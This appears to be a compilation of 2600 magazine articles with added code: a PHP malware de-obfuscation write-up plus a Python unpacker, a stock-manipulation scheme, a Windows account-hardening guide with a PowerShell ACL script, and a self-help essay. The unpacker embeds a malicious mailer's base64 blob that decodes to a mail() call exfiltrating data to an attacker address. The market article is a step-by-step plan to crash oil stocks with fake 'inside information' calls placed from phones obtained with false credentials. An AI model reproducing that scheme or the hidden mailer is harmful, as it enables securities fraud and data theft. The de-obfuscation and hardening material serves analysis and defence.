$OOOOOOOOO=gzuncompress(base64_decode(strtr(fread($OOOOOOOOO,480),'EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz0123456789+/=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')));
eval($OOOOOOOOO);

Cheeky! More of the O's and zeroes. Reformatted and renamed...

// next lines address the data lines
$stream1=fopen($file,'rb');
while(--$line)fgets($stream1,1024);
fgets($stream1,4096);
$b1=fread($stream1,480);
$b1='W/«lots of snippage»1/8lsR3kgX3JRrh9Em';
$b2=strtr($b1,'EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz0123456789+/=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/');
$b3=base64_decode($b2);
$b4=gzuncompress($b3);

So the original third line comes into play - the 40kB is all data for the routine obfuscated in the second line. The script opens its own file, reads the data line, uses strtr to translate characters, then performs another base64_decode and gzuncompress on the resulting data. Interestingly, here we see evidence that this has been obfuscated with a tool of some sort - the strtr string starts "Enteryou", which is quite possibly the start of "Enter your seeding string here" or some similar default value. Not that anyone but a madman would roll this stuff by hand, of course. Or reverse engineer it.

By now, I was feeling mightily proud of myself. I was clearly getting closer. $b4 contained another blooming mash of O's and zeroes, base64_decodes, gzuncompresses, freads, strtr's, and a new one for me, ereg_replace, which when tidied gave us...

$c2=fread($stream1,$offset);
$c3=strtr($c2,'EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz0123456789+/=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/');
$c4=base64_decode($c3);
$c5=gzuncompress($c4);
//$c1=ereg_replace('__FILE__',"'".$file."'",$c5);
$c6=strlen($c5);
print($c6);
print($c5); // dump the secret script
fclose($stream1);
return;
?>

Now I wondered if I was going in circles? Earlier I had, for 90 minutes. The code is so cleverly recursive that if you miscount a position, etc., you literally end up in a loop. Utterly brilliant, but that meant the code had to succumb to me or kill me trying. I have to admit, my worksheet was getting crazily messy by now, and some of my workings may well appear to be missing steps - this article is about the principle though, not this script. But this was it, I now had the final script, hidden deep inside some crazy obfuscated code. The first thing AVG did when I tried to save the file was to panic. I knew I'd hit paydirt. And indeed it was an exploitation tool kit designed to run on Unix and Linux variants, very cute indeed. I'm afraid I won't list the actual code here. It's not relevant and it's not nice, and frankly I've lost a chunk of it.

But this journey is typical of the work you have to put into seemingly impossible de-obfuscation of scripting languages. They're usually obfuscated with software tools, they're usually several layers deep, and they try every kind of diversion they can to throw you off the scent, into loops, etc. I learned more about the internals of PHP de-obfuscating this code than any tutorial has ever taught me.

There are other techniques in use to try to protect scripts - you might find scripts referenced in a client-side include, for instance, in the hope that as they don't appear in your browser, you can't see the script. Try your browser cache for these scripts. JavaScript has its share of obfuscated code too - again you'll see string replacements, offsets, loops within loops, obscure programming constructs, anything to throw you off the scent - but remember, it will always give you a cleartext version of the script in the end, otherwise the engine couldn't run it. The best thing you can do from here is to find some obfuscated code, and have a go yourself - it's quite rewarding when you finally see what someone has worked so hard to stop you from seeing. Often, it's quite mundane - some idiot has thought you really want to copy his crappy alert('Page Protected by xxx') script - but sometimes you hit the weird and wonderful stuff, and it's quite informative.

Well obfuscated code will not give up any secrets in a regular debugger either - taking it out of context can cause problems, or executing a whole line at a time will prevent you from stepping through every iteration of an obfuscation. You need to pull the code to pieces to see what happens at the heart. Work methodically, evaluate terms one at a time, rename stupidly named variables, but be sensitive to PHP's magic constants like __LINE__, which can trip you up. Each step reveals more puzzles to solve, but in the end you can discover some of the guilty secrets of the web! It's a good hobby. Maybe post some of your steps, discoveries, and gotchas to 2600 too, so we can all learn a bit more. Thank you for your attention and interest. I hope this has inspired you somehow.
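The unpacking the article does by hand, as an added example in Python (my code, not Cliff's worksheet and not the obfuscator's own tool). It covers both of the article's cases: the one-shot eval(base64_decode("...")) of the Yoga0400 mailer and the layered eval(gzuncompress(base64_decode(...))) loader that reads its real payload from behind the closing ?> tag with fgets()/fread() and a custom strtr() alphabet. Only the strtr() alphabet and the mailer's base64 blob are taken from the article; the sample PHP file, the hard-coded $line/$offset values and the payload text are constructed here so the script runs offline. PHP's gzuncompress() is zlib framing, which Python's zlib.decompress() reads directly.

```python
"""Peel layered PHP eval()/base64/gzuncompress/strtr obfuscation (added example)."""
import base64
import re
import zlib

# Custom alphabet from the article's strtr() call. PHP strtr() with two string
# arguments maps FROM[i] -> TO[i] and ignores the extra trailing '=' in FROM.
STRTR_FROM = ("EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz"
              "0123456789+/=")
STRTR_TO = ("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
            "0123456789+/")

# The base64 blob from the Yoga0400 mailer, exactly as printed in the article.
YOGA_BLOB = ("bWFpbCgiZ3JvZmlfaGFja0Bob3RtYWlsLmNvbSIsICRzdWJqOTgsICRtc2csICRt"
             "ZXNzYWdlLCAkcmE0NCk7")


def php_strtr(text, frm, to):
    """PHP strtr($text, $from, $to): single-character, position-wise map.
    Characters past the end of the shorter argument are left untouched."""
    n = min(len(frm), len(to))
    return text.translate(str.maketrans(frm[:n], to[:n]))


def decode_layer(blob, compressed=True, custom_alphabet=False):
    """Reverse one [strtr ->] base64_decode [-> gzuncompress] layer."""
    if custom_alphabet:
        blob = php_strtr(blob, STRTR_FROM, STRTR_TO)
    raw = base64.b64decode(blob)
    if compressed:
        raw = zlib.decompress(raw)      # gzuncompress() == zlib framing
    return raw.decode("latin-1")


# eval(base64_decode("...")) and eval(gzuncompress(base64_decode('...'))).
# Group 1 records whether the gzuncompress() wrapper is present.
EVAL_RE = re.compile(
    r"eval\s*\(\s*(gzuncompress\s*\(\s*)?base64_decode\s*\(\s*"
    r"['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*(?(1)\))\s*\)")


def peel_evals(source, max_layers=16):
    """Replace each eval() wrapper with the code it would have executed, until
    none is left. Returns the rewritten source and the layers removed."""
    layers = []
    for _ in range(max_layers):
        m = EVAL_RE.search(source)
        if m is None:
            break
        blob = re.sub(r"\s+", "", m.group(2))   # drop PHP string continuations
        inner = decode_layer(blob, compressed=m.group(1) is not None)
        layers.append(inner)
        source = source[:m.start()] + inner + source[m.end():]
    return source, layers


def read_trailer(php_file, skip_lines, nbytes):
    """What the loader does: skip `skip_lines` lines of its own file with
    fgets(), then fread(nbytes). PHP never parses text after the closing ?>,
    so the tail of the file is a convenient hiding place."""
    data = php_file.encode("latin-1")
    pos = 0
    for _ in range(skip_lines):
        nl = data.find(b"\n", pos)
        if nl < 0:
            raise ValueError("file is shorter than the loader expects")
        pos = nl + 1
    return data[pos:pos + nbytes].decode("latin-1")


def unpack(php_file):
    """Whole walk: peel the eval() layers, take line/offset from the loader,
    read the trailer and decode it with the custom alphabet."""
    _, layers = peel_evals(php_file)
    loader = layers[-1]
    m = re.search(r"\$line=(\d+);\$offset=(\d+);", loader)
    if m is None:
        raise ValueError("loader does not carry the expected line/offset")
    trailer = read_trailer(php_file, int(m.group(1)), int(m.group(2)))
    return decode_layer(trailer, compressed=True, custom_alphabet=True)


# --- constructed sample, built the way the obfuscator would build it ---------
def _wrap(code, custom_alphabet=False):
    """Inverse of decode_layer(); used only to build the sample file."""
    blob = base64.b64encode(zlib.compress(code.encode("latin-1"))).decode()
    return php_strtr(blob, STRTR_TO, STRTR_FROM) if custom_alphabet else blob


FINAL_SCRIPT = "<?php echo 'constructed payload hidden behind the ?> tag'; ?>"
TRAILER = _wrap(FINAL_SCRIPT, custom_alphabet=True)
SKIP_LINES = 5          # the trailer is line 6 of the constructed file
LOADER = (              # $line/$offset hard-coded here; the real one used __LINE__
    "$file=__FILE__;$line=%d;$offset=%d;$stream1=fopen($file,'rb');"
    "while(--$line)fgets($stream1,1024);fgets($stream1,4096);"
    "$b1=fread($stream1,$offset);"
    "eval(gzuncompress(base64_decode(strtr($b1,'%s','%s'))));"
    % (SKIP_LINES, len(TRAILER), STRTR_FROM, STRTR_TO))
SAMPLE_FILE = (
    "<?php\n"
    "// This file is protected by copyright law (constructed sample)\n"
    "eval(gzuncompress(base64_decode('%s')));\n" % _wrap(LOADER)
    + "return;\n?>\n" + TRAILER + "\n")

if __name__ == "__main__":
    print(decode_layer(YOGA_BLOB, compressed=False))
    print(unpack(SAMPLE_FILE))
```

Running it prints the mailer's hidden mail() call and then the constructed payload recovered from behind the ?> tag. The regex only handles string-literal arguments on purpose: once the argument is an expression (strtr(fread(...))) the loader has to be read, not pattern-matched, which is exactly the point where the article switches from the online decoder to a debugger.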
Winter 2008-2009
by Isreal

The following is an educational article and should be treated as such. I, the author, hold no responsibility for anyone who uses this information in an illegal manner. With that out of the way, let's explore how a small bit of low-tech social engineering can exploit gas prices and the foundation of the economy.

A year or two ago I read about a group of phreakers who were conning folks. At the time no one could seem to catch them or get any kind of leads. Apparently the scam went like this: a tiny company on the stock market that had very low stock prices would be selected, and they would send text messages or voice mails to many people, pretending they had a piece of inside information.

Inside information is illegal on the stock market. Keep this in mind because the victims in this scam do not want to report themselves breaking the law! Notice, I said texts and voice mails, not real phone calls. This is important because most people would not just pass out inside information on a hot stock tip to just anybody. This would allow the phreakers' messages to come across as wrong numbers, but still get the point across.

Most of the time, reports said that voice mail was left by an attractive sounding woman's voice. (Probably to keep men listening.) They would usually be in a panic, talking hurriedly and sneakily, saying that they just found out some news around "the firm" about XYZ stock and that someone should be quickly buying it. They might even hint that they are talking about inside information but usually not say it outright.

Eventually, after enough messages were sent, the stocks would in fact start to jump a little. The great thing about the stock market and disinformation like this is that if enough people start buying to make a difference, it becomes a real gain. Other investors start seeing this and they too start buying it. But supposedly the phreakers would sell out when the worthless stocks peaked and take the profits. Real investors would sell and then all the saps would be left with these crappy little stocks.

All this sounds grand, but how could this information be helpful? Or rather, could it be useful in reverse? Every day I go to the gas pump I get mad. Who doesn't right now? But the price of gas is mostly decided by two things: supply and demand. Supply is nothing we can really control. (Unless you work for OPEC.) However, demand is generated by two things: consumption and stocks!

So, if you redid the scenario, only you told people to sell, this would be equally economically manipulative. It would also be more plausible to just target one oil giant, say Exxon-Mobil for example. If one company's stock started a drastic drop, it could cause a panic on the whole oil market. Not to mention it sounds more believable that one would have inside information on one company, not an entire industry. Even if you only dent that one company, the others will follow the price they charge to not be outsold by a competitor.
Now that we have a method and a target we need to find a means of injection. This part would work differently because we are now selling, not buying. Anyone can buy stuff, but to sell we need to find people who own these stocks. I suppose an elite hacker could break into a database full of shareholders' contact numbers, but that is beyond the scope of this article. Here we are going to use our good friend Google! A simple search of "Stockbroker + MyTown" will probably render many results, as it will for any other town you type in. Stockbrokers are never supposed to spread inside information. (And cops are never supposed to break the law...) It happens; it's their job to suggest to people what to buy, what not to buy, and sometimes what to sell. Reaching them will help reach the people who keep them in a job by buying and selling stock. Any respectable broker these days will have a website with a phone number on it. Not to mention, many of these guys have watched the oil companies' shares skyrocket the last few years and own some themselves!

Now, there are a multitude of ways we could send these aggressive texts and voicemails - by phreaking, Bluetooth hacking, VoIP, etc. These are all great ideas, but again they fall outside the scope of a mere social engineering article. For now, let's reproduce this experiment very low-tech. Most of us have seen the prepaid cell phones in stores. Fake credentials are usually easy to come by, if the carrier even checks them at all. Or a good eBay phone with a prepaid GSM SIM card will work fine too. It may take thousands of calls to make a real dent in a stock's price. After all, if you call 2000 brokers, not everyone will have that stock. If they do, they may not think that the wrong number they got was from someone who really knew what they were talking about.

They may also have a legal or moral issue with acting on inside information, but that won't stop them from watching! Here's the catch: once the stock has started to slide, it is no longer inside information, it's just a bold fact. You're no longer acting on illegal advice, you're acting on the actual flow of the market. People who had ethical questions before will no longer have an issue and will sell. The people who didn't believe you before will see it start slipping or sliding and sell. Finally, the other investors who you never even contacted will see this and, if you've made a big enough dent, they will sell too! This could cause a panic and perhaps prompt a sell-off in oil stocks you did not slander as well. When market shares plummet, so does demand and price. This would be one way to lower the price of gas... If it were legal.
by DieselDragon

Making Your Windows Box A Little More Secure

0x00. Introduction:

Following a long period of playing around with the various security tools and features in Windows, I thought that I'd share some of my findings. Hopefully, this might help those of us "locked in" to using the Windows family in protecting our machines a little bit better than they are normally. The things detailed here have been tested and applied on a machine running Windows XP Pro SP2, but should hopefully be supported in all versions of Windows 2000, XP and Vista.

0x01. Who this guide is for:

Most articles in 2600 seem, to my eye, to be written mainly for those lucky enough to be able to understand and use Linux without experiencing serious implosion of the brain. Sadly, some of us are classic victims of vendor lock-in and, try as we might, find that the only kind of OS we can efficiently use is one of the Microsoft Windows family of operating systems. This article is primarily aimed at general users of Windows, and concentrates mainly on applying secure practices in Windows XP. The methods and practices used here should also be adaptable for use in Windows Vista and other operating systems. This article has been written so that it can be used easily by those without much computer know-how (such as the less computer-savvy friends of regular readers) and as a result a lot of the wording may appear very simple and newbie-friendly to more experienced readers. Please accept my apologies in advance if this article is too simplistic or verbose.

If You("Experienced user") = True Then
    Goto 0x07
End If

0x02. Security in Windows - A brief intro:

With the exception of Windows CE and ME, the Windows operating system has been based on NT technology from Windows 2000 onwards. One of the major benefits of this change has been a switch-over from using the FAT filesystem - which had been in use since 1980, and had no support for user accounts and file security - to the NTFS filesystem, which supports user accounts and allows for user-specific access control to individual files and folders. In short, this means that any user on a Windows 98/ME machine can install programs and make changes to the operating system without needing administrative privileges, whereas users on Windows 2000/XP/Vista computers who don't have administrator privileges cannot generally make any changes except creating and changing files inside their own document folders. In addition, the same security measures also mean that User A cannot read or change User B's files unless User A has administrative privileges, or User B has specifically allowed User A access to those files.

0x03. A hypothetical case-study:

Let's take the Doe family: John and Jane Doe, and their three children: Claire, Mark, and David. They bought their home PC from a major computer store about two years ago. It came with Windows XP Home Edition. John uses the computer for editing sensitive work documents that include private financial and client data. Jane runs a business from home and uses the computer to keep track of business finances, word processing, client management, and online banking. The children mainly use the computer for surfing the Internet and using various instant messaging applications, although Claire also manages an ever increasing music library using iTunes, Mark creates and edits music using several studio packages, and David plays just about any half interesting game that can be freely downloaded from the Internet.

When they set up their computer, the Doe family simply plugged it in and turned
it on, giving no thought to computer and user management. They created user accounts for everyone using the Windows default settings - unwittingly giving all five users full administrative privileges, and allowing anyone logged in to the machine to install programs and change any aspect of the operating system.

At this stage, everyone has become extremely annoyed with the computer. Over time it has gradually slowed down and become increasingly unreliable. Their anti-virus programs (of which they have several) continually warn of viruses and malware that keep appearing over and over, and nothing they try seems to get rid of them. They can't seem to figure out how all of this malware keeps making its way through the firewall and installing itself onto the computer. In addition, unusual transactions from foreign countries have recently started appearing on Jane's business account with an ever increasing frequency.

0x04. Spotting the security flaws:

Anyone with an eye for computer security will immediately spot several major mistakes in the way that the system has been set up and managed. Giving all users of the computer administrative privileges is a major error in any circumstance. Especially so, when some of those users are children. As any parent will readily testify, children love playing computer games. The first thing he or she will do upon coming home is to download and install the game so that they can play it with their friends and compete for the highest score. Very rarely will a child think to run a virus/malware scan over the game before installing it. They may even think that it's safe just because it came from a website. If the game comes with malware attached, as so many "free" games and applications do, then it'll be installed along with the game and gain full access to everything on the system. Remember, the child's account has admin rights. In this case, a firewall (or even 1,000 firewalls) would be completely useless in preventing the application from making it to the computer, because the initial connection to the download site was made by the user. Although a firewall might warn the user that the application is trying to communicate with the Internet when it's run, many users will allow such communications as a reflex action, especially if the game, or whatever application, is known to make use of some kind of online functionality.

Likewise, giving any regularly used account administrative rights is an unwise practice for a computer in a home or general office environment, as it would grant any potentially malicious code (say, ActiveX controls in a web page) full rein of the system. It takes only a momentary lapse in security - or just a single web page - for malicious code to arrive and be executed on the computer. For general computer use, the best practice, in my personal opinion, is for every user of the system to have a restricted user account that can only make changes to the user's own document folders, and to have a single administrator account that is password protected and is only ever used for system maintenance purposes and the installation of known, trusted applications... similar to the best practice often applied on Linux machines concerning use of the "root" account.

Although this practice would not defeat all forms of malware, it should make it much harder for a malicious application to gain full control of the system and access every file on the machine. This means that malware arriving and successfully installing itself under a child's account can only access and manipulate data in the child's document folders, and should only be able to monitor whatever that child is doing, as opposed to monitoring every keystroke and mouse click of every user of the machine. Remember that when an application is run, it is subject to the same privileges and restrictions as the user who started it, therefore an application running under a restricted user account should not be able to make changes to the operating system, or access any other user's files.

0x05. A clean, more secure installation:

John Doe has had enough of the constant virus and malware alerts, the abysmal machine and Internet performance, and the continual errors. Enlisting the help and advice of a computer-literate friend (who we'll call Bob), he decides to go for a full format and reinstallation of his system. Under Bob's supervision, he carefully backs up user files on the machine, avoiding unrecognized EXE, COM, MSI, and VBS files in the children's accounts. He unplugs the Ethernet cable from the back
of the computer, and reboots the machine with the Windows XP CD-ROM inserted. After rebooting, he performs a full NTFS format of the hard drive, and Windows XP begins installing as normal. After the usual succession of reboots, progress bars, language/network related prompts, setting a very strong password for the "Administrator" account, and on-screen messages of how "superior" Windows XP is, he comes to the Windows XP first-run screen, or what Microsoft calls an "Out of Box Experience." Upon arriving at the page where the user enters names for accounts that will use the machine, Bob tells him to stop entering account names as there is a problem with this page: all accounts created here will be given administrative rights by default. (They can be demoted later from the User Accounts control panel with "Change the account type", but it is easy to forget, and a fresh install is the moment to get it right.) Instead, Bob advises creating a single account called "SuperUser" that can be used to create general user accounts, and for system administration at a later date.

After even more waiting around whilst Windows gets its first-run act together, John is finally logged in as "SuperUser" and gets a default Windows desktop. Before doing anything else, Bob shows him how to turn on the Windows firewall (My Computer > Network Connections > Right-click the Internet connection > Select "Properties" > Click the "Advanced" tab > Check the box and click "Apply") and he sets it up with the "Don't allow exceptions" rule. John then reconnects his Ethernet cable, activates Windows over the Internet, and updates his machine using Windows Update. Now his machine has been fully updated with the latest security patches, and the most up-to-date settings for default users have been applied.

After updating Windows with the latest security patches and making a "clean start" system restore point (Start > Programs > Accessories > System Tools > System Restore), he proceeds to the "User Accounts" control panel to create logons for himself, his wife, and kids. Before doing anything else though, he sets a suitably strong password for the "SuperUser" account so that only authorized users (himself and Bob in this case) can perform system-wide changes and application installations. After this, he creates new accounts for everyone and ensures that everyone, himself included, has a "restricted" account that will not be able to change anything that would affect the system. Additionally, he turns off the "Fast user switching" feature (User Accounts control panel > Change the way users log on or off) to reduce the chance of a malicious application running under a restricted user account managing to "jump" over to the SuperUser account if both are logged in at the same time. Finally, after reinstalling Windows, activating the Windows firewall, creating restricted accounts for all users, performing fresh installs of security software and firewalls, and restoring backed-up user data, he tests his restricted account by logging on and trying to install an application, finding it to his satisfaction that the install program quits with an "Access denied - User has no administrative privileges" error.

0x06. Dealing with troublesome applications:

A year after reinstalling his system in this way, everyone is still happy with how well it's working. Although the system does slow down every so often thanks to the large number of system services installed (security software, iTunes, and several cellphone application suites), the number of malware and virus alerts has remained very low - such alerts often being traced to game install packages downloaded by the children, which would be checked and verified by John first before installation via the SuperUser account if that application was considered safe.

However, there is one problem: David, having recently developed a serious addiction to World of Warcraft (WoW), is requesting that his user account be made into an Administrator's account. The reason is that WoW is frequently updated with new patches and software updates, and although David can play the game fine with a restricted account, updates need to be installed as the "SuperUser". It normally runs under David's account, and thus only has read permissions for the WoW program folder, and John can't always be there to update the game as soon as a new patch is released. Noting that the majority of malware and virus alerts on the system are traced to files stored in David's account, John is rightly against the idea of giving David's account administrative rights. He consults Bob for advice on how to work around the problem without placing the system at risk.
around the problem without placing the system at risk. Bob knows that every file and folder on an NTFS drive has an Access Control List (or ACL) attached to it that controls which users can access, create, or change that file. Noting that David is the only family member who uses WoW, he logs in as "SuperUser", opens the command prompt (Start > Run > type "command.com" and hit [Enter]), changes to the "Program Files" folder by typing "CD progra~1" [Enter] (which is a DOS short-path and should be valid on Win XP and Vista PCs), and checks the ACL for the World of Warcraft folder by typing "cacls Worldo~1" [Enter]. This shows a list of which users have access to the WoW folder; all users can read it, but only administrators can make changes. Typing "cacls /?" will display a brief guide to using the command.

The next step is best done only by experienced computer users: Bob decides to give David full access rights to the World of Warcraft folder, and uses the command "cacls Worldo~1 /T /E /C /G David:F". This gives David full read/write/modify/execute rights to the WoW program folder and every file and folder below it. After verifying the output, Bob logs out of "SuperUser" and asks David to log in and try running WoW to see if the changes to the ACL were successful. David tries some functions that would result in data being changed on the hard drive (performing a WoW update, taking in-game screenshots, and setting up character macros are three such tests that can be performed), and finds that now the in-game screenshots and character macros have been saved to the WoW program folders successfully.

As a precaution, Bob also adds a shortcut to David's startup folder (Start > Programs > Startup) that fires up the antivirus program and performs a full scan on the WoW folder to make sure that no malware infections in the WoW folder go undetected, before WoW itself is run.

Another approach to solving this problem, useful if an application is accessed by multiple users, is to create a new restricted user account specifically for that program, give the account read/write or full access to the relevant folder using CACLS, and change the application shortcuts to make sure that the program is run under the application-specific account (Right-click the shortcut > Select "Properties" > Click the "Advanced" button under the "Shortcut" tab > Select "Run As" or "Run with different credentials") instead of the current user's account. An additional benefit to this approach, assuming that the "Protect my files, folders and settings" option is checked, is that anything running under that account, including malware, will be denied access to user files or folders by Windows. However, this technique would inhibit legitimate read/write operations to user files if it was applied to a program that uses them, such as Microsoft Word.

Following Bob's simple modification to the WoW folder ACL, David has been able to play and update World of Warcraft himself, without needing John or Bob to log in under the "SuperUser" account. This has saved David a lot of inconvenience and waiting around, and John no longer has to deal with continual requests and SMS messages asking him to come home and update WoW as soon as he can!

0x07. Windows security and best-practice summary:

For those who have lost all track of what I am saying thanks to the sheer volume of text above, here is a brief "bullet-point" summary of the article:

• Windows 2000, XP and Vista all use the more secure NTFS filesystem by default, and this makes it easier to control which users can do what. If you're still using Windows 98 or ME (or horror of horrors, Windows 95!) with a FAT filesystem, consider upgrading your operating system as quickly as possible. This also applies to Windows 2000/XP computers upgraded from Windows 95/98/ME that are still using a FAT filesystem on the hard drive instead of NTFS.

• Firewalls may prevent malware from sending data (keylogging info, etc.) to external servers, but they won't stop viruses or malware from arriving on a machine if a user unknowingly downloads them in the first place. Most firewalls allow known web browsers (IE and Firefox, to name but a few) to always connect to the Internet, effectively throwing open the door for malicious data to come through if the user opens the connection in the first place.

• Viruses and malware can only run with

Winter 2008-2009 ----------------- Page 23
the same privileges as the current user, at least until they are run under an account with admin rights. Therefore, if the current user account is a restricted one, any malware programs running under it will only be able to change data under the user's own data folders and "shared documents", and will have a great degree of difficulty installing themselves as a system-wide application or service.

• When using Windows 2000, XP or Vista, the best practice is to make all user accounts (i.e. the one that you use to log on to Windows) restricted ones, and only use accounts with admin privileges for system maintenance. This is especially important where accounts used by children or teenagers are concerned. By the same token, one should always be very careful when logging onto an account with administrative rights, and make sure that you don't run anything that is potentially unsafe. Do a cold boot (shutdown, wait a minute, then power up again) if you consider it necessary.

• Windows 2000 and XP users beware that accounts created using the initial Windows welcome and setup screens are given administrative privileges by default, and it's very hard to change them to restricted accounts later on. Just create a single "SuperUser" account (use whatever name you wish) to get past the setup screens, and create restricted accounts later on. This might not apply to Vista users, but you should double-check this by looking carefully at the user accounts control panel all the same.

• If a program needs to update itself on a regular basis by writing updated files to its own folders, consider modifying the file/folder ACL using the CACLS command, instead of automatically giving the user of that program administrative rights to the whole system.

• If several users all make use of a regularly updated program, consider creating a restricted user account especially for that program and configure access rights and restrictions for that account, ensuring that the account itself can only change the program and directly associated files that it has been created for. Remember to set the program to only run under that special account, instead of having it run as the current user.

0xFF. The final word:

I hope that this tutorial has helped you all learn a little about how the security setup works on Windows NT-based platforms, and some best practices for ensuring that your Windows boxes are set up to inhibit or reduce the damage done from unwanted system-wide changes and malware installations. If you need assistance with doing anything mentioned in this article, there are many free support forums out there for Windows users where you should be able to get help much quicker and more easily than I could ever manage!

Shouts to whoever came up with the User/Group/Other permission system in Linux from which the initial principles in this article are derived, and to a family from Guildford who were the inspiration for the case study above, and indeed the article itself.

- - - Hack Thyself - - -
by Kartikeya Putra
alienbaby@freaknetwork.in
http://www.hopistar.org

"All human beings, all persons who reach adulthood in the world today are programmed biocomputers. None of us can escape our own nature as programmable entities. Literally, each of us may be our programs, nothing more, nothing less." - John C. Lilly, Programming and Metaprogramming in the Human Biocomputer

In the early 1970s, during the early days of Artificial Intelligence research, scientists from the fields of psychology and computer science came together to try to improve their
understanding of how the mind works. Their efforts eventually resulted in the discipline now known as Cognitive Science. One of the more significant books to come out of this early collaborative effort was titled Scripts, Plans, Goals, and Understanding by Roger Schank and Robert Abelson, which is still used by psychologists today to support what's called the Information Processing Model of human cognition. In it, the authors suggested that human thinking is based on a set of scripts (programs) people use to meet personal goals in different situations. The example they use throughout the book is a "restaurant script" that tells people how to behave when eating out in public, in order to meet the goal of getting fed. What would you do if you ordered a hamburger and the waitress brought you a hot dog? Your scripts tell you how to handle this situation, what to do when the bill comes, and how to handle the multitude of common transactions that take place in the restaurant environment.

Scripts People Live by Claude Steiner is a book about a form of popular psychology called Transactional Analysis. Here the author talks about how everyone has a sort of running "life script" which is basically the story of your own life as you like to tell it. Inside this script there are recurring roles that are often learned in childhood, which inform us how people are supposed to behave. I doubt that anyone ever reaches adulthood with a completely accurate script of their own life story - but if you can become conscious of your script, it's possible to start improving it and improving the way you write it as you go along.

Some of our most basic programming concerns what it means to be "good" or "bad." When parents, teachers and other authorities are training us how to be "good," often this has very little to do with doing what is right and is more about training us to behave in ways that are convenient for them. Today the task of programming "reality" has substantially been taken over by television, which is like a very-low-frequency mind control device that sits in your living room, tuning you in to the corporate Matrix mainframe. It is sponsored by corporations who are not concerned with anything at all except selling their products. In one of my favorite commercials on TV right now, this bland dude - who looks to me like he knows he is about to become a complete tool - holds up a McDonald's chicken sandwich and proclaims, "Let's hear it for nonconformity!" Are you fucking kidding me? It's so phony it's almost avant garde. Andy Warhol would love it - I find it disturbing. I know that there must be a lot of people out there who don't see anything wrong with this ad - and others who even buy into it, who think that eating a chicken sandwich for breakfast really is "revolutionary."

When we were teenagers, some of us correctly perceived the system as hypocritical and said, "screw this, I'm out of here." As an adult with a little perspective now I can see that there's nothing wrong with wanting to do your own thing, but rebellion against the system is still a part of it. Maybe we found a peer group who claimed to represent "the resistance," the anti-system - but it's a trick. The anti-system is still part of the system. By joining it you think you are becoming free, but it's just a trick. As an "outsider," if you break laws or do things that hurt yourself or others, you're just playing into the role the system wants you to play - you're doing exactly what you are supposed to do as an "outsider." The anti-system system is there because they need "bad guys" so that they can play the "good guys" in comparison. If you are good and not one of them, the whole system collapses. That is revolutionary!

The foundation on which the whole sadomasochistic world system is erected is the perception of yourself as a victim. A lot of people are starting to figure this out, and when that number reaches a certain tipping point, it is going to alter the structure of the Matrix. Seeing yourself as the world's victim is profoundly disempowering and keeps you locked in a cycle of self-created pain and misery. We break free from this cycle by making a conscious decision to accept complete responsibility for creating our own reality. Get a copy of The Anger Habit Workbook by Carl Semmelroth and study it like a bible. Drs. Barry and Janae Weinhold have an excellent series of e-books titled Breaking Free from the Matrix. There are a lot of wonderful books out there to help us take control of our minds and emotions and break free from the Matrix of social control - find them, and free your mind.
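Returning to the Windows ACL case study earlier in this issue: the one-line cacls change Bob makes ("/T /E /C /G David:F") grants Full control, and the summary bullets recommend the same folder-level ACL edit over handing out administrative rights. The script below is an added example, not code from the article or its author, and it does the same job on a current Windows version with PowerShell's Get-Acl/Set-Acl. It grants Modify rather than Full control (Full also lets the holder rewrite the permissions and take ownership, which an updater never needs), and it includes a probe function that a restricted account can run to confirm the change, in the spirit of the in-game screenshot test. The folder path and the account name "David" are placeholders; it must be run from an administrator account (the article's "SuperUser").

```powershell
# Added example, not code from the 2600 article: grant one restricted user write access
# to a single program folder instead of promoting that user to Administrator.
# Run from an administrator account. The path and the account "David" are placeholders.
param(
    [string]$Folder = 'C:\Program Files\World of Warcraft',   # assumed path
    [string]$User   = "$env:COMPUTERNAME\David"                # assumed local account
)

# 1. Audit: list who can do what on the folder (what "cacls Worldo~1" showed in the article).
function Show-FolderAccess {
    param([string]$Path)
    (Get-Acl -LiteralPath $Path).Access |
        Select-Object IdentityReference, FileSystemRights, AccessControlType, IsInherited |
        Format-Table -AutoSize
}

# 2. Grant Modify (read, write, delete, execute) on the folder, its subfolders and files.
#    The article's "/G David:F" hands out Full control, which additionally lets the user
#    change permissions and take ownership; Modify is the least-privilege choice for a
#    program that only has to update its own files.
function Grant-FolderModify {
    param([string]$Path, [string]$Identity)
    $acl  = Get-Acl -LiteralPath $Path
    $rule = New-Object System.Security.AccessControl.FileSystemAccessRule(
        $Identity,
        [System.Security.AccessControl.FileSystemRights]::Modify,
        [System.Security.AccessControl.InheritanceFlags]'ContainerInherit, ObjectInherit',
        [System.Security.AccessControl.PropagationFlags]::None,
        [System.Security.AccessControl.AccessControlType]::Allow)
    $acl.AddAccessRule($rule)
    Set-Acl -LiteralPath $Path -AclObject $acl
}

# 3. Verify from inside the restricted account: try to create and delete a probe file.
#    Returns $true when the account can write, $false when Windows denies access.
function Test-FolderWritable {
    param([string]$Path)
    $probe = Join-Path $Path ("acl-probe-{0}.tmp" -f [guid]::NewGuid())
    try {
        [System.IO.File]::WriteAllText($probe, 'probe')
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch [System.UnauthorizedAccessException] {
        return $false
    }
}

Show-FolderAccess -Path $Folder            # before: only inherited entries, users read-only
Grant-FolderModify -Path $Folder -Identity $User
Show-FolderAccess -Path $Folder            # after: an explicit Modify entry for David

# Equivalent one-liner with icacls, the tool that replaced cacls on Vista and later
# ((OI)(CI) = inherit to files and subfolders, M = Modify, /T = walk existing children):
#   icacls "C:\Program Files\World of Warcraft" /grant "David:(OI)(CI)M" /T
```

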